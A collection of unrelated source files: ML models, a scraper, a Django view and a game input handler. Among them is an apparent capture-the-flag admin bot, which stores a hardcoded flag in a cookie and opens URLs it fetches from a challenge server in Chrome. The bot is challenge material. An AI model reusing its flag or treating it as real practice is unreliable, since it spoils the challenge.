100:\n return False\n self.vox_size_X = self.vox_util.default_vox_size_X\n self.vox_size_Y = self.vox_util.default_vox_size_Y\n self.vox_size_Z = self.vox_util.default_vox_size_Z\n self.summ_writer.summ_scalar('zoom_sampling/num_tries', float(num_tries))\n self.summ_writer.summ_scalar('zoom_sampling/num_inb', torch.mean(num_inb).cpu().item())\n \n _boxlist_camRs = feed[\"boxlists\"]\n _tidlist_s = feed[\"tidlists\"] # coordinate-less and plural\n _scorelist_s = feed[\"scorelists\"] # coordinate-less and plural\n _scorelist_s = __u(utils_misc.rescore_boxlist_with_inbound(\n utils_geom.eye_4x4(self.B*self.S),\n __p(_boxlist_camRs),\n __p(_tidlist_s),\n self.Z, self.Y, self.X,\n self.vox_util,\n only_cars=False, pad=2.0))\n boxlist_camRs_, tidlist_s_, scorelist_s_ = utils_misc.shuffle_valid_and_sink_invalid_boxes(\n __p(_boxlist_camRs), __p(_tidlist_s), __p(_scorelist_s))\n self.boxlist_camRs = __u(boxlist_camRs_)\n self.tidlist_s = __u(tidlist_s_)\n self.scorelist_s = __u(scorelist_s_)\n\n # for b in list(range(self.B)):\n # # if torch.sum(scorelist_s[b,0]) == 0:\n # if torch.sum(self.scorelist_s[:,0]) < (self.B/2): # not worth it; return early\n # return 0.0, None, True\n\n N = self.boxlist_camRs.shape[2]\n origin_T_camRs = self.origin_T_camRs.unsqueeze(2).repeat(1, 1, N, 1, 1)\n lrtlist_camRs_ = utils_misc.parse_boxes(__p(self.boxlist_camRs), __p(origin_T_camRs))\n lrtlist_camXs_ = utils_geom.apply_4x4_to_lrtlist(__p(self.camXs_T_camRs), lrtlist_camRs_)\n lrtlist_camX0s_ = utils_geom.apply_4x4_to_lrtlist(__p(self.camX0s_T_camXs), lrtlist_camXs_)\n scorelist_s_ = utils_misc.rescore_lrtlist_with_inbound(\n lrtlist_camX0s_, 
__p(self.tidlist_s), self.Z, self.Y, self.X, self.vox_util)\n self.lrtlist_camX0s = __u(lrtlist_camX0s_)\n\n return True # OK\n \n def run_detector(self, feed):\n total_loss = torch.tensor(0.0).cuda()\n __p = lambda x: utils_basic.pack_seqdim(x, self.B)\n __u = lambda x: utils_basic.unpack_seqdim(x, self.B)\n\n results = dict()\n\n self.rgb_camXs = feed['rgb_camXs']\n\n if hyp.do_feat3D:\n self.rgb_memXs = __u(self.vox_util.unproject_rgb_to_mem(\n __p(self.rgb_camXs), self.Z, self.Y, self.X, __p(self.pix_T_cams)))\n self.rgb_memX0s = self.vox_util.apply_4x4s_to_voxs(self.camX0s_T_camXs, self.rgb_memXs)\n self.occ_memX0s = __u(self.vox_util.voxelize_xyz(__p(self.xyz_camX0s), self.Z, self.Y, self.X))\n self.occ_memX0 = self.occ_memX0s[:,0]\n \n feat_memX0_input = torch.cat([\n self.occ_memX0s[:,0],\n self.rgb_memX0s[:,0]*self.occ_memX0s[:,0],\n ], dim=1)\n feat3D_loss, feat_memX0, valid_memX0 = self.featnet3D(\n feat_memX0_input,\n self.summ_writer,\n )\n total_loss += feat3D_loss\n self.summ_writer.summ_feat('3D_feats/feat_memX0_input', feat_memX0_input, pca=True)\n self.summ_writer.summ_feat('3D_feats/feat_memX0', feat_memX0, pca=True)\n \n if hyp.do_det:\n\n self.occ_memX0 = self.vox_util.voxelize_xyz(self.xyz_camX0s[:,0], self.Z, self.Y, self.X)\n self.rgb_memX0 = self.vox_util.unproject_rgb_to_mem(\n self.rgb_camXs[:,0], self.Z, self.Y, self.X, self.pix_T_cams[:,0])\n \n feat_memX0_input = torch.cat([\n self.occ_memX0,\n self.rgb_memX0*self.occ_memX0,\n ], dim=1)\n \n \n lrtlist_camX = self.lrtlist_camX0s[:, 0]\n axlrtlist_camX = utils_geom.inflate_to_axis_aligned_lrtlist(lrtlist_camX)\n lrtlist_memX = self.vox_util.apply_mem_T_ref_to_lrtlist(lrtlist_camX, self.Z, self.Y, self.X)\n axlrtlist_memX = utils_geom.inflate_to_axis_aligned_lrtlist(lrtlist_memX)\n self.summ_writer.summ_lrtlist_bev(\n 'det/boxlist_g',\n self.occ_memX0[0:1],\n lrtlist_memX[0:1],\n torch.ones(1, 50).float().cuda(), # scores\n torch.ones(1, 50).long().cuda(), # tids\n self.vox_util, \n already_mem=True)\n self.summ_writer.summ_lrtlist_bev(\n 'det/axboxlist_g',\n self.occ_memX0[0:1],\n axlrtlist_memX[0:1],\n torch.ones(1, 50).float().cuda(), # scores\n torch.ones(1, 50).long().cuda(), # tids\n self.vox_util, \n already_mem=True)\n\n lrtlist_halfmemX = self.vox_util.apply_mem_T_ref_to_lrtlist(lrtlist_camX, self.Z2, self.Y2, self.X2)\n # print('lrtlist_camR', lrtlist_camR[:, 0])\n # print('lrtlist_camR_check', utils_vox.apply_ref_T_mem_to_lrtlist(lrtlist_halfmemR, self.Z2, self.Y2, self.X2)[:, 0])\n axlrtlist_halfmemX = utils_geom.inflate_to_axis_aligned_lrtlist(lrtlist_halfmemX)\n # print('axlrtlist_halfmem_g', axlrtlist_halfmemR[:, 0])\n\n # axlrtlist_halfmemX_check = self.vox_util.apply_mem_T_ref_to_lrtlist(axlrtlist_camX, self.Z2, self.Y2,\n # self.X2)\n # print('axlrtlist_halfmemR_check', axlrtlist_halfmemR_check[:, 0])\n\n # feat_memX0 = torch.mean(feat_memX0s, dim=1)\n \n\n detect_loss, boxlist_halfmemX_e, scorelist_e, tidlist_e, pred_objectness, sco, ove = self.detnet(\n axlrtlist_halfmemX,\n self.scorelist_s[:, 0],\n feat_memX0_input,\n self.summ_writer)\n lrtlist_halfmemX_e = utils_geom.convert_boxlist_to_lrtlist(boxlist_halfmemX_e)\n # print('lenlist_halfmem_e', utils_geom.get_lenlist_from_lrtlist(lrtlist_halfmemR_e))\n lrtlist_camX_e = self.vox_util.apply_ref_T_mem_to_lrtlist(lrtlist_halfmemX_e, self.Z2, self.Y2, self.X2)\n # print('lenlist_cam_e', utils_geom.get_lenlist_from_lrtlist(lrtlist_camR_e))\n total_loss += detect_loss\n\n lrtlist_e = lrtlist_camX_e[0:1]\n lrtlist_g = lrtlist_camX[0:1]\n 
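# Note added for clarity: from here on only batch element 0 is evaluated and visualized.\n            # The matching step further down is brute force: the Ne predicted boxes are tiled against\n            # the Ng ground-truth boxes (unsqueeze + repeat -> Ne*Ng pairs), each pair is scored with\n            # utils_geom.get_iou_from_corresponded_lrtlists, and a max over dim=2 keeps each\n            # prediction's best-overlap IoU for the box summaries and the mAP sweep over IoU thresholds.\n            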
scorelist_e = scorelist_e[0:1]\n scorelist_g = self.scorelist_s[0:1, 0]\n lrtlist_e, lrtlist_g, scorelist_e, scorelist_g = utils_eval.drop_invalid_lrts(\n lrtlist_e, lrtlist_g, scorelist_e, scorelist_g)\n\n lenlist_e, _ = utils_geom.split_lrtlist(lrtlist_e)\n clist_e = utils_geom.get_clist_from_lrtlist(lrtlist_e)\n lenlist_g, _ = utils_geom.split_lrtlist(lrtlist_g)\n clist_g = utils_geom.get_clist_from_lrtlist(lrtlist_g)\n axlenlist_g, _ = utils_geom.split_lrtlist(axlrtlist_camX[0:1])\n axclist_g = utils_geom.get_clist_from_lrtlist(axlrtlist_camX[0:1])\n\n if self.include_image_summs:\n self.summ_writer.summ_lrtlist('obj/boxlist_e', self.rgb_camXs[:1, 0],\n lrtlist_e,\n scorelist_e,\n tidlist_e, self.pix_T_cams[:1, 0])\n _, Ne, _ = list(lrtlist_e.shape)\n _, Ng, _ = list(lrtlist_g.shape)\n # there may be no prediction or gt in the scene.\n if Ne > 0 and Ng > 0:\n lrtlist_e_ = lrtlist_e.unsqueeze(2).repeat(1, 1, Ng, 1).reshape(1, Ne * Ng, -1)\n lrtlist_g_ = lrtlist_g.unsqueeze(1).repeat(1, Ne, 1, 1).reshape(1, Ne * Ng, -1)\n ious = utils_geom.get_iou_from_corresponded_lrtlists(lrtlist_e_, lrtlist_g_)\n ious = ious.reshape(1, Ne, Ng)\n ious_e = torch.max(ious, dim=2)[0]\n self.summ_writer.summ_lrtlist('obj/boxlist', self.rgb_camXs[0:1, 0],\n torch.cat((lrtlist_e, lrtlist_g), dim=1),\n torch.cat((ious_e, ious_e.new_ones(1, Ng)), dim=1),\n torch.cat((ious_e.new_ones(1, Ne).long(),\n ious_e.new_ones(1, Ng).long() * 2), dim=1),\n self.pix_T_cams[0:1, 0])\n\n self.summ_writer.summ_lrtlist_bev('det/boxlist_e', self.occ_memX0[:1],\n lrtlist_e,\n scorelist_e,\n tidlist_e,\n self.vox_util, \n already_mem=False)\n # visualize the gt and prediction on occ\n self.summ_writer.summ_lrtlist_bev('det/boxlist', self.occ_memX0[0:1],\n torch.cat((lrtlist_e, lrtlist_g), dim=1),\n torch.cat((ious_e, ious_e.new_ones(1, Ng)), dim=1),\n torch.cat((ious_e.new_ones(1, Ne).long(),\n ious_e.new_ones(1, Ng).long() * 2), dim=1),\n self.vox_util, \n already_mem=False)\n\n ious = [0.3, 0.4, 0.5, 0.6, 0.7]\n maps = utils_eval.get_mAP_from_lrtlist(lrtlist_e, scorelist_e, lrtlist_g, ious)\n for ind, overlap in enumerate(ious):\n self.summ_writer.summ_scalar('ap/%.2f_iou' % overlap, maps[ind])\n\n\n \n # axboxlist_camRs = __u(utils_geom.inflate_to_axis_aligned_boxlist(__p(self.boxlist_camRs)))\n # axlrtlist_camRs = __u(utils_geom.convert_boxlist_to_lrtlist(__p(axboxlist_camRs)))\n # if self.include_image_summs:\n # self.summ_writer.summ_lrtlist('obj/axboxlist', self.rgb_camRs[:,0], axlrtlist_camRs[:,0],\n # self.scorelist_s[:,0], self.tidlist_s[:,0], self.pix_T_cams[:,0])\n\n # boxlist_memR = utils_vox.convert_boxlist_camR_to_memR(self.boxlist_camRs[:,0], self.Z2, self.Y2, self.X2)\n # axboxlist_memR = utils_geom.inflate_to_axis_aligned_boxlist(boxlist_memR)\n\n # featRs = utils_vox.apply_4x4s_to_voxs(self.camRs_T_camXs, feat_memXs)\n # featR = torch.mean(featRs, dim=1)\n\n # detect_loss, boxlist_memR_e, scorelist_e, tidlist_e, sco, ove = self.detnet(\n # axboxlist_memR,\n # self.scorelist_s[:,0],\n # featR,\n # self.summ_writer)\n # total_loss += detect_loss\n\n # boxlist_camR_e = utils_vox.convert_boxlist_memR_to_camR(boxlist_memR_e, self.Z2, self.Y2, self.X2)\n # lrtlist_camR_e = utils_geom.convert_boxlist_to_lrtlist(boxlist_camR_e)\n # if self.include_image_summs:\n # self.summ_writer.summ_lrtlist('obj/boxlist_e', self.rgb_camRs[:,0], lrtlist_camR_e,\n # scorelist_e, tidlist_e, self.pix_T_cams[:,0])\n\n # boxlist_e = boxlist_camR_e[0:1].detach().cpu().numpy()\n # boxlist_g = 
self.boxlist_camRs[0:1,0].detach().cpu().numpy()\n # scorelist_e = scorelist_e[0:1].detach().cpu().numpy()\n # scorelist_g = self.scorelist_s[0:1,0].detach().cpu().numpy()\n # boxlist_e, boxlist_g, scorelist_e, scorelist_g = utils_eval.drop_invalid_boxes(\n # boxlist_e, boxlist_g, scorelist_e, scorelist_g)\n\n # ious = [0.3, 0.4, 0.5, 0.6, 0.7]\n # maps = utils_eval.get_mAP(boxlist_e, scorelist_e, boxlist_g, ious)\n # for ind, overlap in enumerate(ious):\n # self.summ_writer.summ_scalar('ap/%.2f_iou' % overlap, maps[ind])\n \n self.summ_writer.summ_scalar('loss', total_loss.cpu().item())\n return total_loss, results, False\n \n \n def forward(self, feed):\n self.prepare_common_tensors(feed)\n return self.run_detector(feed)\n \n\n \n","sub_path":"pytorch_disco_recovery/model_carla_det.py","file_name":"model_carla_det.py","file_ext":"py","file_size_in_byte":22489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"275180802","text":"import logging\nimport time\nfrom typing import List\n\nfrom pydantic import BaseModel\n\nfrom mosec import Server, Worker\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nformatter = logging.Formatter(\n \"%(asctime)s - %(process)d - %(levelname)s - %(filename)s:%(lineno)s - %(message)s\"\n)\nsh = logging.StreamHandler()\nsh.setFormatter(formatter)\nlogger.addHandler(sh)\n\n\nclass EchoReq(BaseModel):\n time: float\n\n\nclass EchoResp(BaseModel):\n msg: str\n\n\nclass Preprocess(Worker):\n def forward(self, data: EchoReq) -> float:\n logger.debug(f\"pre received {data}\")\n return data.time\n\n\nclass Inference(Worker):\n def forward(self, data: List[float]) -> List[float]:\n logger.info(f\"received batch size: {len(data)}\")\n time.sleep(sum(data) / len(data))\n return data\n\n\nclass Postprocess(Worker):\n def forward(self, data: float) -> EchoResp:\n logger.debug(f\"post received {data}\")\n return EchoResp(msg=f\"sleep {data} seconds\")\n\n\nif __name__ == \"__main__\":\n server = Server(EchoReq, EchoResp)\n server.append_worker(Preprocess, num=2)\n server.append_worker(Inference, max_batch_size=16)\n server.append_worker(Postprocess, num=2)\n server.run()\n","sub_path":"examples/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"324296625","text":"from selenium import webdriver\r\nimport requests\r\nimport time\r\n\r\nwhile True:\r\n r = requests.get(\"http://sunrin.kiminfo.kr:18777/onlybot.php\")\r\n if r.text != '0':\r\n driver = webdriver.Chrome('./chromedriver.exe')\r\n driver.implicitly_wait(3)\r\n driver.set_page_load_timeout(3)\r\n \r\n driver.get(\"http://sunrin.kiminfo.kr:18777/\")\r\n driver.add_cookie({\"name\": \"FLAG\", \"value\": \"SUNRIN{rp0rpOrpOrpOzZrp0rprOprOp}\"})\r\n try:\r\n driver.get(r.text)\r\n print(r.text)\r\n time.sleep(3)\r\n driver.quit()\r\n except:\r\n driver.quit()\r\n else:\r\n time.sleep(5)\r\n \r\n print(\"It's working. 
(RPO)\", flush=True)\r\n \r\n \r\n","sub_path":"2022/SUNRIN_CTF/HAPPY/bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"28887202","text":"import libtcodpy as tcod\nimport data\nimport engine\nimport render\n\n\ndef input():\n global recompute_field_of_view\n\n # key = libtcod.console_check_for_keypress() #real-time\n key = tcod.console_wait_for_keypress(True) # turn-based\n\n if key.vk == tcod.KEY_ENTER and key.lalt:\n # Alt+Enter: toggle fullscreen\n tcod.console_set_fullscreen(not tcod.console_is_fullscreen())\n\n elif key.vk == tcod.KEY_ESCAPE:\n return True # exit game\n\n # movement keys\n\n if tcod.console_is_key_pressed(tcod.KEY_UP):\n engine.frogue.move(0, -1)\n render.recompute_field_of_view = True\n\n elif tcod.console_is_key_pressed(tcod.KEY_DOWN):\n engine.frogue.move(0, 1)\n render.recompute_field_of_view = True\n\n elif tcod.console_is_key_pressed(tcod.KEY_LEFT):\n engine.frogue.move(-1, 0)\n render.recompute_field_of_view = True\n\n elif tcod.console_is_key_pressed(tcod.KEY_RIGHT):\n engine.frogue.move(1, 0)\n render.recompute_field_of_view = True\n","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"557259569","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom lxml.html import document_fromstring\nimport re\nimport json\nfrom helpers.exceptions import UrlParseError\n\ndomainUri = 'https://mangalib.me'\n\n\ndef get_main_content(url, get=None, post=None):\n return get('{}/{}'.format(domainUri, get_manga_name(url)))\n\n\ndef get_volumes(content=None, url=None, get=None, post=None):\n items = document_fromstring(content).cssselect('.vol_lst li h5 a')\n return [i.get('href') for i in items]\n\n\ndef get_archive_name(volume, index: int = None):\n name = re.search('\\\\.me/[^/]+/([^/]+/[^/]+)', volume)\n if not name:\n return 'vol_{}'.format(index)\n return name.groups()[0]\n\n\ndef get_images(main_content=None, volume=None, get=None, post=None):\n content = get(volume)\n items = re.search('var\\s+pages.?=.?(\\[{.+?\\}])', content)\n items = json.loads(items.groups()[0])\n href = re.search('[\\'\"](http[^\\'\"]+)[\\'\"].+\\\\.page_image', content)\n if not href:\n _ = re.search('([^/]+)/[^/]+/(\\d+)/.?(\\d+)', volume).groups()\n href = 'https://img1.mangalib.me/manga/{}/chapters/{}-{}/'.format(_[0],_[1],_[2],)\n else:\n href = href.groups()[0].strip('/') + '/'\n return [href + i['page_image'] for i in items]\n\n\ndef get_manga_name(url, get=None):\n name = re.search('\\\\.me/([^/]+)', url)\n if not name:\n raise UrlParseError()\n return name.groups()[0]\n","sub_path":"providers/mangalib_me.py","file_name":"mangalib_me.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"408795731","text":"import mxnet as mx\nimport numpy as np\nfrom collections import namedtuple\nimport time\nimport math\nimport custom_softmax\nfrom numpy_op_softmax import NumpySoftmax\nLSTMState = namedtuple('LSTMState', ['c','h'])\nLSTMParam = namedtuple('LSTMParam',['i2h_weight', 'i2h_bias',\n 'h2h_weight','h2h_bias'])\nLSTMModel = namedtuple('LSTMModel', ['rnn_exec', 'symbol','init_states','last_states','seq_data','seq_labels','seq_outputs','param_blocks'])\n\n\ndef lstm(num_hidden, indata, prev_state, param, seqidx, layeridx, 
dropout=0.):\n #LSTM Cell symbol\n if dropout>0.:\n indata=mx.sym.Dropout(data=indata, p=dropout)\n #Combine Wi, Wf, Wc, Wo into one i2h\n #Combine Ui, Uf, Uc, Uo into one h2h\n i2h=mx.sym.FullyConnected(data=indata, weight=param.i2h_weight, bias=param.i2h_bias, num_hidden=num_hidden*4, name='t%d_l%d_i2h'%(seqidx, layeridx) )\n h2h=mx.sym.FullyConnected(data=prev_state.h, weight=param.h2h_weight, bias=param.h2h_bias,num_hidden=num_hidden*4, name='t%d_l%d_h2h'%(seqidx, layeridx))\n\n gates=i2h+h2h\n\n slice_gates = mx.sym.SliceChannel(gates, num_outputs=4, name='t%d_l%d_slice'%(seqidx, layeridx))\n\n in_gate = mx.sym.Activation(slice_gates[0], act_type='sigmoid')\n forget_gate=mx.sym.Activation(slice_gates[1], act_type='sigmoid')\n out_gate=mx.sym.Activation(slice_gates[2], act_type='sigmoid')\n\n in_transform = mx.sym.Activation(slice_gates[3], act_type='tanh')\n\n next_c=(forget_gate* prev_state.c)+(in_gate*in_transform)\n next_h=out_gate*mx.sym.Activation(next_c, act_type='tanh')\n\n return LSTMState(c=next_c, h=next_h)\n\ndef lstm_unroll(num_lstm_layer, seq_len, input_size, num_hidden, num_embed, num_label, dropout=0.):\n embed_weight=mx.sym.Variable('embed_weight')\n cls_weight=mx.sym.Variable('cls_weight')\n cls_bias=mx.sym.Variable('cls_bias')\n\n param_cells=[]\n last_states=[]\n for i in range(num_lstm_layer):\n param_cells.append(LSTMParam(i2h_weight=mx.sym.Variable('l%d_i2h_weight'%i), \n i2h_bias = mx.sym.Variable('l%d_i2h_bias'%i),\n h2h_weight=mx.sym.Variable('l%d_h2h_weight'%i), \n h2h_bias = mx.sym.Variable('l%d_h2h_bias'%i)\n ))\n state=LSTMState(c=mx.sym.Variable('l%d_init_c'%i), h=mx.sym.Variable('l%d_init_h'%i))\n\n last_states.append(state)\n\n assert(len(last_states)==num_lstm_layer)\n\n loss_all=[]\n for seqidx in xrange(seq_len):\n data=mx.sym.Variable('data/%d'%seqidx)\n hidden=mx.sym.Embedding(data=data, weight=embed_weight, input_dim=input_size, output_dim=num_embed,name='t%d_embed'%(seqidx))\n \n #Deep LSTM\n for i in xrange(num_lstm_layer):\n if i==0:\n dp_ratio=0.\n else:\n dp_ratio=dropout\n next_state=lstm(num_hidden, indata=hidden, prev_state=last_states[i],param=param_cells[i],seqidx=seqidx, layeridx=i, dropout=dp_ratio)\n hidden=next_state.h\n last_states[i]=next_state\n\n if dropout:\n hidden=mx.sym.Dropout(data=hidden, p= dropout)\n fc=mx.sym.FullyConnected(data=hidden, weight=cls_weight, bias=cls_bias, num_hidden=num_label)\n mynumpysoftmax=NumpySoftmax()\n sm = mynumpysoftmax(data=fc, label=mx.sym.Variable('label/%d'%seqidx), name='t%d_sm'%seqidx)\n loss_all.append(sm)\n return mx.sym.Group(loss_all)\n\n\n\n\n\n\ndef lstm_inference_symbol(num_lstm_layer, input_size, num_hidden, num_embed, num_label, dropout=0.):\n \n seqidx=0\n \n embed_weight=mx.sym.Variable('embed_weight')\n cls_weight=mx.sym.Variable('cls_weight')\n cls_bias=mx.sym.Variable('cls_bias')\n\n param_cells=[]\n last_states=[]\n \n # Param init statement\n for i in range(num_lstm_layer):\n param_cells.append(LSTMParam(i2h_weight=mx.sym.Variable('l%d_i2h_weight'%i), \n i2h_bias = mx.sym.Variable('l%d_i2h_bias'%i),\n h2h_weight=mx.sym.Variable('l%d_h2h_weight'%i), \n h2h_bias = mx.sym.Variable('l%d_h2h_bias'%i)\n ))\n state=LSTMState(c=mx.sym.Variable('l%d_init_c'%i), h=mx.sym.Variable('l%d_init_h'%i))\n\n last_states.append(state)\n\n assert(len(last_states)==num_lstm_layer)\n\n\n data=mx.sym.Variable('data/%d' % seqidx)\n\n\n hidden=mx.sym.Embedding(data=data, weight=embed_weight, input_dim=input_size, output_dim=num_embed,name='t%d_embed'%(seqidx))\n \n #Deep LSTM\n for i in 
xrange(num_lstm_layer):\n        if i==0:\n            dp_ratio=0.\n        else:\n            dp_ratio=dropout\n        next_state=lstm(num_hidden, indata=hidden, prev_state=last_states[i],param=param_cells[i],seqidx=seqidx, layeridx=i, dropout=dp_ratio)\n        hidden=next_state.h\n        last_states[i]=next_state\n\n    if dropout:\n        hidden=mx.sym.Dropout(data=hidden, p= dropout)\n    fc=mx.sym.FullyConnected(data=hidden, weight=cls_weight, bias=cls_bias, num_hidden=num_label)\n    sm = mx.sym.Custom(data=fc, label=mx.sym.Variable('label%d'%seqidx), name='t%d_sm'%seqidx, op_type='softmax')\n    out=[sm]\n    for state in last_states:\n        out.append(state.c)\n        out.append(state.h)\n    return mx.sym.Group(out)\n\n\n\n\n\n\n\n\n\n\n    \n","sub_path":"mylstm.py","file_name":"mylstm.py","file_ext":"py","file_size_in_byte":5322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"202217167","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom django.core import serializers\nfrom django.core.paginator import Paginator\nfrom api.users.serializers import UserSerializer\nfrom login.models import User\nfrom api import auth, views\nfrom edbw import settings\nimport libhttp\n\ndef users_callback(key, person, user_type, id_map={}):\n    if 'page' in id_map:\n        page = id_map['page']\n    else:\n        page = -1\n    \n    records = min(id_map['records'], settings.MAX_RECORDS_PER_PAGE)\n\n    if 'id' in id_map:\n        ids = id_map['id']\n        \n        rows = User.objects.filter(id__in=ids).values('json')\n    else:\n        rows = User.objects.all().values('json')\n    \n    paginator = Paginator(rows, records)\n    \n    if page > 0:\n        return views.json_page_resp('persons', page, paginator) #JsonResponse({'page':page, 'pages':paginator.num_pages, 'persons':[x['json'] for x in page_rows]}, safe=False)\n    else:\n        return views.json_resp(paginator.get_page(1))\n\n\ndef users(request):\n    id_map = libhttp.ArgParser() \\\n        .add('key') \\\n        .add('id', multiple=True) \\\n        .add('page', arg_type=int) \\\n        .add('records', default_value=settings.DEFAULT_RECORDS) \\\n        .parse(request)\n    \n    return auth.auth(request, users_callback, id_map=id_map)\n","sub_path":"api/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"370852934","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport math, time\nimport datetime\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers.recurrent import LSTM\n\n# fix the random seed so the results can be reproduced\nfrom keras.optimizers import Nadam\nfrom sklearn.preprocessing import MinMaxScaler\n\nseed = 9\nnp.random.seed(seed)\n\n\n# Load the data from the .csv\ndef get_ad_data(normalized=0, file_name=None):\n    activity = pd.read_csv(file_name, header=0)\n    df = pd.DataFrame(activity) # Create the DataFrame\n    # df.drop(df.columns[[0]], axis=1, inplace=True) # Drop the date column\n    if normalized == 1:\n        scaler = MinMaxScaler(feature_range=(0, 1))\n        dataset = pd.DataFrame(scaler.fit_transform(df))\n        return dataset\n    return df\n\n\n# Comments Prof:\n# the load_data function from lstm.py is configured to accept any number of parameters\n# the last attribute is the one that becomes the label (result)\n# stock is a pandas dataframe (a kind of dictionary + matrix)\n# seq_len is the size of the window to be used in the time series\n#\n# Comments group:\n# Function 
alterada para o problema (separação esntre dados de treino e teste)\ndef load_data(df_dados, janela):\n qt_atributos = len(df_dados.columns)\n mat_dados = df_dados.values # converter dataframe para matriz (lista com lista de cada registo)\n tam_sequencia = janela + 1\n res = []\n for i in range(len(mat_dados) - janela): # numero de registos - tamanho da sequencia\n res.append(mat_dados[i: i + tam_sequencia])\n res = np.array(res) # dá como resultado um np com uma lista de matrizes (janela deslizante ao longo da serie)\n qt_casos_treino = 24 # dois anos de treino, um de teste\n train = res[:qt_casos_treino, :]\n x_train = train[:, :-1] # menos um registo pois o ultimo registo é o registo a seguir à janela\n y_train = train[:, -1][:, -1] # para ir buscar o último atributo para a lista dos labels\n x_test = res[qt_casos_treino:, :-1]\n y_test = res[qt_casos_treino:, -1][:, -1]\n x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], qt_atributos))\n x_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[1], qt_atributos))\n return [x_train, y_train, x_test, y_test]\n\n\n# imprime um grafico com os valores de teste e com as correspondentes tabela de previsões\ndef print_series_prediction(y_test, predic):\n diff = []\n racio = []\n for i in range(len(y_test)): # para imprimir tabela de previsoes\n racio.append((y_test[i] / predic[i]) - 1)\n diff.append(abs(y_test[i] - predic[i]))\n print('valor: %f ---> Previsão: %f Diff: %f Racio: %f' % (y_test[i], predic[i], diff[i], racio[i]))\n plt.plot(y_test, color='blue', label='y_test')\n plt.plot(predic, color='red', label='prediction') # este deu uma linha em branco\n plt.plot(diff, color='green', label='diff')\n plt.plot(racio, color='yellow', label='racio')\n plt.legend(loc='upper left')\n plt.show()\n\n\n# util para visualizar a topologia da rede num ficheiro em pdf ou png\ndef print_model(model, fich):\n from keras.utils import plot_model\n plot_model(model, to_file=fich, show_shapes=True, show_layer_names=True)\n\n\n\ndef build_model3(janela):\n model = Sequential()\n model.add(LSTM(30, input_shape=(janela, 14), return_sequences=True))\n model.add(Dropout(0.1))\n model.add(LSTM(20, input_shape=(janela, 14), return_sequences=True))\n model.add(Dropout(0.1))\n model.add(LSTM(10, input_shape=(janela, 14), return_sequences=False))\n model.add(Dropout(0.1))\n model.add(Dense(16, activation=\"relu\", kernel_initializer=\"normal\"))\n model.add(Dense(1, activation=\"linear\", kernel_initializer=\"normal\"))\n model.compile(loss='mse', optimizer='nadam', metrics=['mse', 'accuracy'])\n return model\n\n\n\ndef load_ad_dataset():\n #nornalizado\n return get_ad_data(1, 'adData.csv')\n\n\n\ndef print_history_accuracy(history):\n print(history.history.keys())\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('Model Accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n\ndef print_history_loss(history):\n print(history.history.keys())\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('Model Loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n\nif __name__ == '__main__':\n df = load_ad_dataset()\n print(\"df\", df.shape)\n janela = 2 # tamanho da Janela deslizante um ano\n X_train, y_train, X_test, y_test = load_data(df, janela)\n print(\"X_train\", X_train.shape)\n print(\"y_train\", y_train.shape)\n print(\"X_test\", X_test.shape)\n 
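# with janela=2, X_train should come out as (24, 2, n_cols) here — (24, 2, 14) assuming the 14-column adData.csv used by build_model3\n 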
print(\"y_test\", y_test.shape)\n model = build_model3(janela)\n history = model.fit(X_train, y_train, batch_size=1, validation_data=(X_test, y_test), epochs=200, verbose=2,\n shuffle=False)\n print_history_loss(history)\n print_model(model, \"lstm_model.png\")\n trainScore = model.evaluate(X_train, y_train, verbose=0)\n testScore = model.evaluate(X_test, y_test, verbose=0)\n print(model.metrics_names)\n p = model.predict(X_test)\n predic = np.squeeze(\n np.asarray(p)) # para transformar uma matriz de uma coluna e n linhas em um np array de n elementos\n print_series_prediction(y_test, predic)\n print('Train Score: %.2f MSE (%.2f RMSE)' % (trainScore[0], math.sqrt(trainScore[0])))\n print('Test Score: %.2f MSE (%.2f RMSE)' % (testScore[0], math.sqrt(testScore[0])))\n","sub_path":"lstm/adData-LTSM.py","file_name":"adData-LTSM.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"172524644","text":"import torch\nfrom torch.utils.data import Dataset\nimport numpy as np\n\nfrom torch.utils.data import DataLoader\n\nDEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\nclass myDataset(Dataset):\n def __init__(self, data_path, transcripts_path):\n self.data = np.load(data_path, encoding='bytes')\n self.flag = False\n if transcripts_path != None:\n self.label = np.load(transcripts_path)\n self.flag = True\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n sequence = self.data[index]\n sequence = torch.tensor(sequence)\n if self.flag is True:\n target = self.label[index]\n target = torch.tensor(target)\n return sequence, target\n else:\n return sequence, [-1]\n\ndef 